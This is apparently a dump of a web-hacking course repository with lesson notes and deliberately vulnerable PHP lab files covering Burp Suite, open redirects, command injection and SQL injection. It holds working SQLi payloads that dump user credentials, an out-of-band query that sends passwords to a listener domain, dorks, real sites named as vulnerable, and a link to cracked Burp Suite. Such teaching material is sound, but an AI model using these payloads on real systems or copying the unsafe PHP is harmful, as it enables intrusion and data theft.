20 | 21 | - payload refers to the part of the virus that performs malicious actions, such as compromising data, destroy information, or hijacking the computer system. 22 | 23 | ## 5. Exploitation 24 | 25 | - take advantage of vulnerability to gain system access 26 | 27 | ## 6. Backdoor 28 | 29 | - a hidden entery point into website or application that bypass starndard security measures like login and authentication 30 | 31 | ## 6. Zero Day 32 | 33 | - unique computer vulnerability that is unknown to victims and potentially unknown to everyone in the world except the creator of the zero-day exploit 34 | 35 | ## 7. Phishing 36 | 37 | - Phishing is a type of social engineering where an attacker sends a fraudulent fake message designed to trick a person into revealing sensitive information to the attacker 38 | 39 | ## 8. Cookies 40 | 41 | - A cookie is a small packet of information from a visited webserver stored on your system by your computer’s browser. It is designed to store personalized information in order to customize your next visit -------------------------------------------------------------------------------- /lesson_notes/w-3.0_BurpSuit_Ref/Burpsuit_Lacture.drawio.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-3.0_BurpSuit_Ref/Burpsuit_Lacture.drawio.png -------------------------------------------------------------------------------- /lesson_notes/w-3.0_BurpSuit_Ref/burpCrack_install.md: -------------------------------------------------------------------------------- 1 | # BurpSuite Crack Installation 2 | 3 | ## BurpSuite Crack Download Link 4 | `https://drive.google.com/file/d/1OQfvQdNfjcx2XafZzNje3U_M0A1op8gw/view?usp=sharing` 5 | 6 | ## Desktop Entry(burp.desktop) Code 7 | 8 | ``` 9 | [Desktop Entry] 10 | Name=BurpSuite 11 | Comment=Burp 12 | GenericName=Burp 13 | Exec=/usr/lib/jvm/java-11-openjdk-amd64/bin/java --illegal-access=permit -Dfile.encoding=utf-8 -javaagent:/opt/Burp-2020.2.9/BurpSuiteLoader_v2020.9.2.jar -noverify -jar /opt/Burp-2020.2.9/burpsuite_pro_v2020.9.2.jar 14 | Icon=/opt/Burp-2020.2.9/burp.png 15 | Terminal=false 16 | Type=Application 17 | StartupNotify=true 18 | ``` 19 | -------------------------------------------------------------------------------- /lesson_notes/w-3.0_BurpSuit_Ref/w-3.1.b_lacture_recap.md: -------------------------------------------------------------------------------- 1 |

Lacture Recap

2 | 3 | ----------------------------- 4 | 5 | ## Objective 6 | 7 | 8 | #### 1. To understand Basic Burp Usage 9 | #### 2. How to scan and find parameter 10 | #### 3. How to repeat the request and testing 11 | #### 4. How to attack using intruder 12 |
13 | 14 | ## Advance Usage of Sublime-Text 15 | ----------------------------- 16 | #### 1. How to Install package 17 | #### 2. Hot to use installed package 18 | #### 3. How to use markdown preview 19 | #### 4. How to build in sublime 20 |
21 | 22 | ## Lab Link 23 | ---------------------- 24 | #### 1. `http://testphp.vulnweb.com/` 25 | 26 | #### 2. `http://lab.awh.exdemy.com/chapter1/DVWA/login.php` 27 |
28 | 29 | ## Example Wordlist 30 | ---------------------- 31 | ``` 32 | test 33 | admin 34 | password 35 | root 36 | 1234 37 | toor 38 | abcd 39 | 40 | ``` 41 | -------------------------------------------------------------------------------- /lesson_notes/w-3.0_BurpSuit_Ref/w-3.1.c_test_wordlist.txt: -------------------------------------------------------------------------------- 1 | test 2 | admin 3 | password 4 | root 5 | 1234 6 | toor 7 | abcd 8 | -------------------------------------------------------------------------------- /lesson_notes/w-3.0_BurpSuit_Ref/w-3.1.d_BurpDecodeErrorSolve.md: -------------------------------------------------------------------------------- 1 | ## Ctrl+shift+U (Url Decode) not working solution 2 | 3 | ``` 4 | 5 | This shortcut can be changed or disabled using the ibus-setup utility: 6 | 7 | 8 | 9 | 1. Run ibus-setup from the terminal (or open IBus Preferences). 10 | 11 | 2. Go to “Emoji”. 12 | 13 | 3. Next to “Unicode code point:”, click on the three dots (i.e. ...). 14 | 15 | 4. In the dialog, click “Delete”, then “OK”. 16 | 17 | 5. Close the IBus Preferences window. 18 | 19 | 20 | 21 | Reference: https://superuser.com/questions/358749/how-to-disable-ctrlshiftu 22 | ``` 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /lesson_notes/w-4.0_open_redirection/w-4.1.a_Basic Theory about Openredirection.md: -------------------------------------------------------------------------------- 1 | 2 |

Open Redirection

3 | 4 | 5 | ## Definition 6 | 7 | - redirection to an arbitrary external domain 8 | (user can manipulate this redirect parameter) 9 |
10 | 11 | - Open Redirect vulnerabilities don't get enough attention from developers because they don't directly damage website and do not allow an attacker to directly steal data that belong to the company 12 | 13 | ## Example url 14 | 15 | + ` http://example.com/example.php?url=http://malicious.example.com` 16 | 17 |
18 | 19 | 20 | ![Web Archi](../photo/openRe.png) 21 | 22 | ## How to Exploit 23 | 24 | ### 1. Phishing 25 | 26 | 27 | ![Web Archi](../photo/phishing.png) 28 | 29 | ### 2. Execute Java Scirpt (XSS attack) 30 | 31 | - Rare in modern browser 32 | 33 | - Example (not working now) 34 | + `https://example.com/index.php?go=javascript:alert(document.cookie)` 35 | 36 | 37 | ## How to Prevent 38 | 39 | - Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs 40 | 41 | 42 | 43 | - Not let the user contorl where your page redirects 44 | 45 | 46 | 47 | - Warning the user 48 | + eg: `https://google.com/amp/bing.com` 49 | 50 | 51 | ## Major words use in redirect 52 | 53 | ``` 54 | url 55 | RelayState 56 | ReturnUrl 57 | RedirectUri 58 | Return 59 | Return_url 60 | Redirect 61 | Redirect_uri 62 | Redirect_url 63 | RedirectUrl 64 | Forward 65 | ForwardUrl 66 | Forward_URL 67 | SuccessUrl 68 | Redir 69 | Exit_url 70 | Destination 71 | ``` 72 | 73 | 74 | 75 | ## Google Dorking For Open Redirection 76 | 77 | ``` 78 | allinurl:"=https" 79 | allinurl:"=http" 80 | allinurl:=https 81 | allinurl:=http 82 | allinurl:%3Dhttps 83 | allinurl:%3Dhttps* 84 | allinurl:%253Dhttps 85 | allinurl:%253Dhttps* 86 | allinurl:%3Dhttp 87 | allinurl:%3Dhttp* 88 | allinurl:%253Dhttp 89 | allinurl:%253Dhttp* 90 | allinurl: 91 | ``` 92 | 93 | ## Example Vulnerable Website 94 | 95 | 96 | 1. `http://educratsweb.com/` 97 | 98 | + ### vulnerable Parameter 99 | 100 | `http://educratsweb.com/l.php?url=https://scholarships.gov.in/fresh/newstdRegfrmInstruction` 101 | `http://tapestry.click/Count.php?Link=https://www.oxy.edu/&Type=Org&ID=US-OCCDNT` 102 | 103 | 104 | ## Lab Link 105 | 106 | `https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection` 107 | 108 | 109 | ## Example Bounty Price 110 | 111 | 112 | ![Web Archi](../photo/openBounty_1.png) 113 | 114 |
115 | 116 | ![Web Archi](../photo/openBounty_2.png) 117 | 118 |
119 | 120 | ![Web Archi](../photo/openBounty_3.png) 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | -------------------------------------------------------------------------------- /lesson_notes/w-5.0_Command_Injection/w-5.1.a_CommadI_Theory.md: -------------------------------------------------------------------------------- 1 |

Command Injection Essential Theory

2 | 3 | # Command Injection Definition 4 | 5 | * Operating system command injection 6 | vulnerabilities arise when an application 7 | incorporates user-controllable data into a 8 | command that is processed by a shell command 9 | interpreter 10 | 11 | 12 | # Theory for Command Injection 13 | 14 | ![Web Archi](../photo/com_inject.png) 15 | 16 | # Type of Command Injection 17 | 18 | 1. Result Based (Output > Vsible) 19 | 2. Blind Based (Output > Not visible) 20 | 21 | 22 | # General Testing Process 23 | 24 | ### 1. Select Entry Point (Parameters) 25 | ### 2. Testing with Payload (delimiters) 26 | ### 3. Exploit 27 | ### 4. Mataining access 28 | 29 | 30 | 31 | # Tools for Exploiting Command Injections 32 | * commix (Command Injecction Exploiter) 33 | * Example Usage 34 | - `python commix.py –url=”http://192.168.32.130/vulnerabilities/exec/` 35 | 36 | 37 | 38 | 39 | # Command Parameters that can be consider for testing 40 | 41 | ``` 42 | cmd 43 | exec 44 | command 45 | execute 46 | ping 47 | query 48 | jump 49 | code 50 | reg 51 | do 52 | func 53 | arg 54 | option 55 | load 56 | process 57 | step 58 | read 59 | function 60 | req 61 | feature 62 | exe 63 | module 64 | payload 65 | run 66 | print 67 | ``` 68 | 69 | 70 | 71 |

Links for this lecture

72 | 73 | ## My github Link 74 | 75 | `https://github.com/Dr-404/WebHacking` 76 | 77 | ## Shell Link for exploit 78 | 79 | `https://github.com/Dr-404/WebHacking/tree/main/shells/AlphaShell` 80 | 81 | 82 | ## Labs Link 83 | 84 | `http://lab.awh.zdresearch.com/` 85 | 86 | 87 | 88 | ## Command Injection Payloads 89 | ``` 90 | https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/os-cmd-execution/command-execution-unix.txt 91 | 92 | ``` -------------------------------------------------------------------------------- /lesson_notes/w-5.0_Command_Injection/w-5.1.b_delimiters.md: -------------------------------------------------------------------------------- 1 | # This is the operator (Chaining Command) for command injection 2 | 3 | 4 | ### 1. `&&` (Logiacl AND) 5 | > this operator will only execute if the command preceding this operator has been successfully executed 6 | 7 | ### 2. `;` (Semi-colon) 8 | > this operator will execute even if the command preceding this operator is not successfully executed. 9 | 10 | ### 3. `||` (logical OR) 11 | > this operator is only executed if the command preceding it has failed. 12 | 13 | ### 4. `|` (Pipe) 14 | > The output of the first command acts as input to the second command -------------------------------------------------------------------------------- /lesson_notes/w-5.0_Command_Injection/w-5.2.c_phpCodes/commandInject_1.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Code Injection 7 | 8 | 9 |
10 |

11 | Enter Your Command: 12 | 13 | 14 |

15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 | {$cmd2}
"
27 | 
28 | 
29 | 
30 |  ?>


--------------------------------------------------------------------------------
/lesson_notes/w-5.0_Command_Injection/w-5.2.c_phpCodes/commandInject_2.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 	
 5 | 	
 6 | 	Code Injection
 7 | 
 8 | 
 9 | 	

10 | 			

11 | 				Enter an IP address:
12 | 				
13 | 				
14 | 			

15 | 
16 | 		

17 | 
18 | 
19 | 
20 | 
21 | 
22 | 
23 | {$cmd}
";
29 | 
30 | 
31 |  ?>


--------------------------------------------------------------------------------
/lesson_notes/w-5.0_Command_Injection/w-5.5.a_out-of-band_theory.md:
--------------------------------------------------------------------------------
 1 | 
Out-of-band Injection Theory

 2 | 
 3 | ### OOB injection is an exploitation to exfiltrate data and information through different outbond channel
 4 | 
 5 | ## Traditional Injection Technique (In-Band)
 6 | 
 7 | 
 8 | ![Web Archi](../photo/inband.png)
 9 | 
10 | #### eg SQL Databse Query to make DNS request
11 | 
12 | ```
13 | select
14 | load_file(CONCAT('\\\\',(SELECT+@@version),'.',(SELECT+user),'.',
15 | (SELECT+password),'.','n5tgzhrf768l71uaacqu0hqlocu2ir.burpcollabo
16 | rator.net\\vfw'))
17 | ```
18 | 
19 | 
20 | 

21 | 
22 | ## OOB Injection
23 | 
24 | 
25 | 
26 | ![Web Archi](../photo/oob.png)
27 | 
28 | # How to get listening server
29 | 	1. Install BurpSuite Professional (Crack)
30 | 	2. Use Burp Collaborator Client 
31 | 	4. DNS request to listening Server
32 | 	3. Collect captured info
33 | 
34 | 
35 | ## Formula
36 | 
37 | ### For Command Injection
38 | 
39 | `𝑂𝑂𝐵 Commandinjection = 𝐹𝑖. (system 𝑐𝑜𝑚𝑚𝑎𝑛𝑑𝑠 + 𝐹𝑄𝐷𝑁)`
40 | 
41 | where,
42 | 
43 | 
44 | Fi     = function that initiates outbound request

45 | FQDN   = domain name of the listening server (Burpcollaborator domain name)
46 | 

47 | 
48 | ### For Sql Injection
49 | 
50 | `𝑂𝑂𝐵 𝑆𝑄𝐿𝑖 = 𝐹𝑖. (𝑆𝑄𝐿 𝑐𝑜𝑚𝑚𝑎𝑛𝑑𝑠 + 𝐹𝑄𝐷𝑁)`
51 | 
52 | 
53 | 
54 | Fi     = function that initiates outbound request

55 | FQDN   = domain name of the listening server (Burpcollaborator domain name)
56 | 

57 | 
58 | 
59 | #### References
60 | A Study of Out-of-Band Structured Query Language Injection by Lee Chun How  (doi: 10.5281/zenodo.3556347)
61 | 


--------------------------------------------------------------------------------
/lesson_notes/w-6.0_sql_injection/6-1_basic_SQLi.md:
--------------------------------------------------------------------------------
  1 | # SQL injection
  2 | 
  3 | ## Definition
  4 | 
  5 | >A SQL injection is a technique that attackers use to gain unauthorized access to a web application database by adding a string of malicious code to a database query
  6 | 
  7 | 
  8 | 
  9 | ![Basic SQL](../photo/sqli.png)
 10 | 
 11 | photo credit to [orginal_Link](https://www.cloudprotector.com/sql-injection/)
 12 | 
 13 |  * To understand SQL injection you need to understand basic SQL query 
 14 | 
 15 | ## SQL Basic
 16 | 
 17 | * Theree type of SQL Command
 18 | 	- DDL: Data Definition Language
 19 | 	- DCL: Data Control Language
 20 | 	- DML: Data Maniputlation Language (mainly use)
 21 | 	
 22 | ## Data Manipulation language (DML)
 23 | 
 24 | #### CRUD operation
 25 | 
 26 | 
 27 | 	
 28 | 		
 29 | 		
 30 | 		
 31 | 	
 32 | 	
 33 | 		
 34 | 		
 35 | 		
 36 | 	
 37 | 	
 38 | 		
 39 | 		
 40 | 		
 41 | 	
 42 | 	
 43 | 		
 44 | 		
 45 | 		
 46 | 	
 47 | 	
 48 | 		
 49 | 		
 50 | 		
 51 | 	   
 52 | 
 53 | 
 54 | 
 55 | 
 No  CURD Operation  SQL command 
 1 CreateINSERT
 2 READSELECT
 3 UPDATEUPDATE
 4 DELETEDELETE

 56 | 
 57 | SELECT is the most using statement in SQL injection
 58 | 
 59 | 
 60 | ## SQL language structure
 61 | 
 62 | **SELECT** something **FROM** table **WHERE** conditions **GROUP BY** aggragate_condition **Having** aggreate_condition **ORDER BY** order_field	
 63 | 
 64 | ## SQL command flow chart
 65 | 
 66 | ![SQL Flow Chart](../photo/sqli2.png)
 67 | 
 68 | Credit to original photo [Stackoverflow](https://stackoverflow.com/questions/20940363/how-do-you-read-sqlite3-diagrams-flowcharts)
 69 | 
 70 | ## Exampl SQL Command
 71 | 
 72 | Find the brand and price of computer from shop which is more than 1000 USD
 73 | 
 74 | #### Example Database 

 75 | 
 76 | 
 77 |     
 78 |         
 79 |         
 80 |         
 81 |     
 82 | 
 83 | 	
 84 | 		
 87 | 		
 90 | 		
 93 | 	
 94 | 	
 95 | 		
 96 | 		
 97 | 		
 98 | 	
 99 | 	
100 | 		
101 | 		
102 | 		
103 | 	
104 | 	
105 | 		
106 | 		
107 | 		
108 | 	
109 | 
110 | 
Shop

 85 | 			id
 86 | 		
 88 | 			brand
 89 | 		
 91 | 			pirce
 92 | 		
1Lenovo700
2Dell1200
3Acer1500

111 | 
112 | #### Exampl SQL query
113 | ```
114 | SELECT  brand, price
115 | FROM shop
116 | WHERE price > 1000
117 | ```
118 | 
119 | 
120 | ## Most used query in SQL injection
121 | 
122 | #### 1.UNION
123 | ```
124 | SELECT 1,2,3 UNION SELECT 4,5,6;
125 | ```
126 | 
127 | * numbers of column must be match
128 | * similar data type
129 | * same order
130 | * can use in finding number of column (not common)
131 | 
132 | #### Demonstartion using university_small database
133 | 
134 | * Look lecture video and try to understan how union operator work
135 | * There was two table **instructor** and **course**
136 | 
137 | **Select from only one table**
138 | 
139 | `SELECT * from insturcotr;`
140 | 
141 | 
142 | 
143 | **Using union select and extract data from difference table**
144 | 
145 | `select * from instructor union select course_ID,title,dept_name,credits from course;`
146 | 
147 | #### example query finding column count
148 | 
149 | `select * from instructor union select 1,2,3,4;`
150 | 
151 | 
152 | 
153 |  
154 | #### 2. Using **TRUE** condition and extract data from table
155 | 
156 |  **Normal_Query**
157 | 
158 | `SELECT * FROM instructor WHERE id=10101`
159 | 
160 |  **INJECTION** 
161 | 
162 | `select * from instructor where id=0 or 1=1;`
163 | 
164 | #### 3. GROUP_CONCAT or CONCAT
165 | 
166 | GROUP_CONCAT() function is used to concatenate all the rows of the returned result
167 | 
168 | `select * from instructor union select group_concat(name,' : ', ID),2,3,4 from instructor;`
169 | 
170 | #### 3. ORDER BY
171 | 
172 | * Use to find the nubmer of column
173 | 
174 | `select * from instructor order by 4;`
175 | 
176 | #### 4. (-- or --+)
177 | * Sql comment (to comment out all the query behind this)
178 | 
179 | #### 5. Database()
180 | * show database name
181 | 
182 | #### 6. user()
183 | * show database username
184 | 
185 | 
186 | 
187 | 
188 | 
189 | ## Type of SQL injection
190 | 
191 | 
192 | 
193 | ![SQL Type](../photo/sqli3.png)
194 | 
195 | Credit to [purpelbox_paper](https://medium.com/purplebox/sql-injection-da949c39dbe6)
196 | 
197 | 


--------------------------------------------------------------------------------
/lesson_notes/w-6.0_sql_injection/6-2_finding_SQLI.md:
--------------------------------------------------------------------------------
 1 | # How to find SQL Injection Vulnerability
 2 | 
 3 | ## Methodology
 4 | 
 5 | 1. Find parameter to inject
 6 | 2. Identify the vulnerability
 7 | 3. Enumerate data from the database
 8 | 4. Upload a backdoor
 9 | 
10 | 
11 | ## 1. Finding Parameter
12 | 
13 | 1. Intercept the proxy with burp and scan to obtain parameter  (identify all the data entry on the Web application)
14 | 2. Visit throughly web application 
15 | 
16 | #### Main Parameter of Injection
17 | 
18 | 
19 | 1. GET Parameter
20 | 2. POST Parameter
21 | 3. Cookes (usually used for authentication, session control)
22 | 4. Header (Host, Referer, User-Agent)
23 | 
24 | 
25 | **Note**: 

26 | 
27 | The Host header field specifies the
28 | Internet host and port number of the resource being requested. The Referer field specifies
29 | the resource from which the current request was obtained. The User-Agent header field
30 | determines the Web browser used by the user. Although these cases are uncommon, some network monitoring and Web trend applications use the Host, Referer, and User-Agent header
31 | values to create graphs, for example, and store them in databases. In such cases, it is worth testing
32 | those headers for potential injection vulnerabilities.
33 | 
34 | 
35 | 
36 | ## 2. Identify the vulnerability
37 | 
38 | 1. Manipulating Parameters and  making application error
39 | 
40 | `http://testphp.vulnweb.com/listproducts.php?artist=1`
41 | 
42 | 2. Identify error and type of database
43 | 
44 | Example Error
45 | 
46 | `You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘VALUE’’.`
47 | 
48 | 
49 | This Error Show
50 | * Database Name = 'MySql'
51 | * Exact syntax caused error = single quote
52 | * Where error occured = after the parameter value
53 | * 
54 | ## 3. Enumearte data from Database
55 | 
56 | ![SQL Flow Chart](../photo/sqli4.png)
57 | 
58 | 
59 | 
60 | #### Finding Table Name
61 | 
62 | ```
63 | SELECT GROUP_CONCAT(table_name)
64 | FROM information_schema.tables
65 | WHERE table_schema=database()
66 | ```
67 | 
68 | #### Finding Column Name
69 | 
70 | ```
71 | (SELECT GROUP_CONCAT(column_name)
72 | FROM information_schema.columns 
73 | WHERE table_name='users')
74 | ```
75 | 
76 | #### Emeurate all data
77 | 
78 | ```
79 | SELECT GROUP_CONCAT(name,pass) FROM users
80 | ```
81 | 
82 | 
83 | ## 5.Upload Backdoor ???


--------------------------------------------------------------------------------
/lesson_notes/w-6.0_sql_injection/6-3_errorBased_SQLi.md:
--------------------------------------------------------------------------------
  1 | # Error Based (Double Query) SQL Injection
  2 | 
  3 | - `A double query` combining two queries into a single query and getting the information through the SQL error message from the database. 
  4 | 
  5 | - Union injection can not be used when the web pages fail to retrieve any results (Error, Expected Results) from the database while we inject it with a single query, Then we should use double query SQL injection technique. It is a manual injection technique to dump the data from the database.
  6 | 
  7 | [Reference](https://securiumsolutions.com/blog/sql-injection-by-double-query-securiumsolutions/#:~:text=A%20double%20query%20SQL%20injection,error%20message%20from%20the%20database.)
  8 | 
  9 | 
 10 | # Mysql Query for Error Based Injection
 11 | 
 12 | ## 1. `Sub-Query` or `Double Query`
 13 | 
 14 | - `A subquery is a SQL query nested inside a larger query.`
 15 | 
 16 | - A subquery may occur in :
 17 |     - A SELECT clause
 18 |     - A FROM clause
 19 |     - A WHERE clause
 20 | The subquery can be nested inside a SELECT, INSERT, UPDATE, or DELETE statement or inside another subquery.
 21 | A subquery is usually added within the WHERE Clause of another SQL SELECT statement.
 22 | 
 23 | 
 24 | ## 2. `rand()` 
 25 | 
 26 | - This function return random decimal number between 0 and 1.
 27 | 
 28 | ## 3. `floor()`
 29 | 
 30 | - The function retrun largest inter value.(Less than or equal to a number)
 31 | 
 32 | ## 4. `Group by`
 33 | 
 34 | - aggregate same values in the coulumn as single value
 35 | 
 36 | ## 5. `count`
 37 | 
 38 | - Count the no. of rows that present in the database
 39 | 
 40 | 
 41 | 
 42 | 
 43 | # Theory of Error Based or Double Query Injection
 44 | 
 45 | 
 46 | 1. Combine two queries into single query 
 47 | 2. Use SQL_function and make application to show error message
 48 | 3. dump juicy info through error message
 49 | 
 50 | 
 51 | 
 52 | # Example mysql_function to make application error
 53 | 
 54 | ## 1. count()
 55 | 
 56 | `select count(*) from information_schema.tables;`
 57 | 
 58 | - display how many row in `information_schema.tables;`
 59 | 
 60 | ## 2. rand() and floor()
 61 | 
 62 | `select rand();`
 63 | `select floor(rand()*2);`
 64 | `select floor(rand()*2)test;`
 65 | 
 66 | 
 67 | ## 3. Double Query and Make Application Error
 68 | 
 69 | #### Extract Juicy info from error
 70 | 
 71 | `select x from y;`
 72 | 
 73 | #### Double Query
 74 | 
 75 | - `select database();`
 76 | 
 77 | - `select concat("::",database(),"::","CONCAT FUNCTION");`
 78 | 
 79 | - `select concat("::",database(),"::",floor(rand()*2));`
 80 | 
 81 | #### adding variable `a`
 82 | 
 83 | - `select concat("::",database(),"::",floor(rand()*2))a from information_schema.columns;`
 84 | 
 85 | #### `group by` with a
 86 | 
 87 | - `select concat("::",database(),"::",floor(rand()*2))a from information_schema.columns group by a;`
 88 | 
 89 | 
 90 | #### use `count()` and making web application to error
 91 | 
 92 | `select count(*), concat("::",database(),"::",floor(rand()*2))a from information_schema.columns group by a;`
 93 | 
 94 | #### Modified query
 95 | `(select 1 from(select count(*), concat("::",database(),"::",floor(rand()*2))a from information_schema.columns group by a)b);`
 96 | 
 97 | 
 98 | #### insert this query to `,database(),` area
 99 | 
100 | `(select table_name from information_schema.tables where table_schema=database() limit 0,1)`
101 | 
102 | 
103 | 
104 | # Emurating Database
105 | 
106 | ## Emurating database
107 | 
108 | `(select 1 from(select count(*), concat("::",database(),"::",floor(rand()*2))a from information_schema.columns group by a)b);`
109 | 
110 | ## Emurating Tables (`insert query in database area`)
111 | 
112 | `(select 1 from(select count(*), concat("::",(select table_name from information_schema.tables where table_schema=database() limit 0,1),"::",floor(rand()*2))a from information_schema.columns group by a)b);`
113 | 
114 | ## Emurating Columns (`insert query in database area`)
115 | 
116 | `(select 1 from(select count(*), concat("::",(select column_name from information_schema.columns where table_name="users" and table_schema=database() limit 0,1),"::",floor(rand()*2))a from information_schema.columns group by a)b);`
117 | 
118 | ## Emurating Data
119 | 
120 | ### enumerating username
121 | 
122 | `(select 1 from(select count(*), concat(concat("::::",(select name from users limit 0,1)),floor(rand()*2))a from information_schema.columns group by a)b);`
123 | 
124 | ### emuerating all data
125 | 
126 | #### 1. Removing all query within `concat`
127 | 
128 | `(select 1 from(select count(*), concat((),floor(rand()*2))a from information_schema.columns group by a)b);`
129 | 
130 | #### 2. Adding another `concat` to insert another query
131 | 
132 | `(select 1 from(select count(*), concat(concat(),floor(rand()*2))a from information_schema.columns group by a)b);`
133 | 
134 | #### 3. Adding select statement to dump data
135 | 
136 | `(select 1 from(select count(*), concat(concat((select name from users limit 0,1)),floor(rand()*2))a from information_schema.columns group by a)b);`
137 | 
138 | 
139 | 
140 | #### 4. Adding anther concat  (`at name area`)to dump all data from users table
141 | 
142 | `(select 1 from(select count(*), concat(concat("::::",(select concat(name,":::::::",password,":::::",status,":::::",work) from users limit 0,1)),floor(rand()*2))a from information_schema.columns group by a)b);`
143 | 
144 | 
145 | 
146 | 
147 | ## lab Full Query Query (ZD-Lab,SQLI,Lesson-5)
148 | 
149 | `AND+(select+1+from(select count(*), concat("::",(select table_name from information_schema.tables where table_schema=database() limit 0,1),"::",floor(rand()*2))a from information_schema.columns group by a)b)--+`
150 | 
151 | 
152 | 
153 | 
154 | 
155 | 
156 | 
157 | 
158 | 
159 | 
160 | 
161 | 
162 | 
163 | 
164 | 
165 | 
166 | 
167 | 
168 | 
169 | 
170 | 
171 | 
172 | 
173 | 
174 | 
175 | 
176 | 
177 | 
178 | 


--------------------------------------------------------------------------------
/lesson_notes/w-6.0_sql_injection/6-4_Blind_SQL_Injection.md:
--------------------------------------------------------------------------------
  1 | 
Blind SQL Injection

  2 | 
  3 | # Boolean Based SQL Injection
  4 | 
  5 | - Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response
  6 | 
  7 | 
  8 | # SQl function you need to know
  9 | 
 10 | 
 11 | ## `length()`
 12 | 
 13 | - Return the length of the string, in bytes
 14 | 
 15 | #### Syntax
 16 | 
 17 | `LENGTH(string)`
 18 | 
 19 | - eg. `SELECT LENGTH("SQL Tutorial");`
 20 | - eg. `SELECT LENGTH(databse());`
 21 | 
 22 | 
 23 | 
 24 | ## `substring()`
 25 | 
 26 | - The `SUBSTRING()` function extracts a substring from a string (starting at any position).
 27 | 
 28 | #### Syntax
 29 | 
 30 | `SUBSTRING(string, start, length)`
 31 | 
 32 | - eg. `SUBSTRING("sqltest",2,3;)`
 33 | - eg. `SUBSTRING(database(),1,1)`
 34 | 
 35 | 
 36 | 
 37 | 
 38 | ## `ascii()`
 39 | 
 40 | - The ASCII() function returns the ASCII value for the specific character
 41 | 
 42 | #### Syntax
 43 | 
 44 | `ASCII(character)`
 45 | 
 46 | ## `CHAR()`
 47 | 
 48 | -  `CHAR()` returns the character value of the given integer value according to the ASCII table
 49 | 
 50 | #### Syntax
 51 | 
 52 | `CHAR(ASCII number)`
 53 | 
 54 | 
 55 | ## `IF()`
 56 | 
 57 | - The IF() function returns a value if a condition is TRUE, or another value if a condition is FALSE
 58 | 
 59 | #### Syntax
 60 | 
 61 | `IF(condition, value_if_true, value_if_false)`
 62 | 
 63 | - eg. ` IF(500<1000, "YES", "NO")`
 64 | 
 65 | 
 66 | 
 67 | 
 68 | 
 69 | 

 70 | 
 71 | 
 72 | 
Practical Lab (Boolean-Based) Training 

 73 | 
 74 | 
 75 | `In this session, We used SQLi Lab Lesson-8`
 76 | 
 77 | ## 1. Finding parameter to inject 
 78 | 
 79 | `http://localhost:8000/chapter1/sqli_lab/Less-8/?id=2`
 80 | 
 81 | - Background Query
 82 | 
 83 | 	- `SELECT * FROM table_name WHERE id='2'`
 84 | 
 85 | ## 2. Identify the vulnearbility
 86 | 
 87 | - 1. test with quote `'` or `"`
 88 | - 2. Fix Error with `-- -` or `--+`
 89 | - 3. Testing with condition
 90 | 
 91 | 	- TRUE  Condition ==> `AND 1=1` or `AND '1'='1` 
 92 | 	- FALSE Condition ==> `AND 1=2` or `AND '1'='2` 
 93 | 
 94 | ## 3. Emnumerate Data
 95 | 
 96 | ### 1. Finding Length of Database
 97 | 
 98 | - Use `<` and `=` operater and find the length of Database name
 99 | - `AND (LENGTH(database())) < 10` 
100 | - `AND (LENGTH(database())) = 8` 
101 | 
102 | ### 2. Finding Database name using `ascii()` and `substring()` Function
103 | 
104 | 
105 | - `AND (ascii(substring(database(),1,1))) < 100`
106 | 
107 | ### 3. Finding Table name 
108 | 
109 | #### Step by step payload creation
110 | 
111 | - `AND (ascii(substring()))`
112 | 
113 | - `(select table_name from information_schema.tables where table_schema= database() limit 0,1);
114 | `
115 | 
116 | #### Final payload (I already know user tables is fourth table and then use `limit 3,1`)
117 | 
118 | - `AND (ascii(substring((select table_name from information_schema.tables where table_schema= database() limit 3,1), 1,1 ))) < 100`
119 | 
120 | ### 4. Finding Column name
121 | 
122 | 
123 | `AND (ascii(substring((select column_name from information_schema.columns where table_name = 'users' and table_schema= database() limit 1,1), 1,1 ))) < 100`
124 | 
125 | 
126 | 
127 | 
 Time-Based Injection

128 | 
129 | 
130 | ## Mostly same as Boolean Based Injection and used SQLI lab `lesson 10`
131 | 
132 | 
133 | ## Identify the vulnerability
134 | 
135 | `' and sleep(10)--+`
136 | 
137 | `" and sleep(10)--+`
138 | 
139 | ## Payload
140 | 
141 | `" and if(100<200,sleep(10),Null)--+`
142 | 
143 | `" and if(ascii(substring(database(),1,1)) = 115,sleep(10),Null)--+`
144 | 
145 | 
146 | 
147 | 
148 | 


--------------------------------------------------------------------------------
/lesson_notes/w-6.0_sql_injection/mysql_errorBased.php:
--------------------------------------------------------------------------------
 1 | connect_error) {
21 |   die("Connection failed: " . $conn->connect_error);
22 | }
23 | 
24 | 
25 | $uid = $_GET['id'];
26 | $sql = "SELECT * FROM users WHERE id=$uid"; # 3rwrgdsnsgjn
27 | $result = $conn->query($sql);
28 | 
29 | if ($result->num_rows > 0) {
30 |   // output data of each row
31 |   while($row = $result->fetch_assoc()) {
32 |     //echo "Greeting  : ", $row['status'];
33 |     //echo "
";
34 |     //echo "Department  : ", $row['work'];
35 |     //echo "
";
36 |     echo "1 result";
37 |   }
38 | } else {
39 |   echo "0 results";
40 | }
41 | $conn->close();
42 | 
43 | ?>
44 | 


--------------------------------------------------------------------------------
/lesson_notes/w-6.0_sql_injection/mysqli.php:
--------------------------------------------------------------------------------
 1 | connect_error) {
21 |   die("Connection failed: " . $conn->connect_error);
22 | }
23 | 
24 | 
25 | $uid = $_GET['id'];
26 | $sql = "SELECT * FROM users WHERE id='$uid'";
27 | $result = $conn->query($sql);
28 | 
29 | if ($result->num_rows > 0) {
30 |   // output data of each row
31 |   while($row = $result->fetch_assoc()) {
32 |     echo "Greeting  : ", $row['status'];
33 |     echo "
";
34 |     echo "Department  : ", $row['work'];
35 |     echo "
";
36 |   }
37 | } else {
38 |   echo "0 results";
39 | }
40 | $conn->close();
41 | 
42 | ?>


--------------------------------------------------------------------------------
/lesson_notes/w-7.0_waf_bypass/7.1_Basic_waf_function.md:
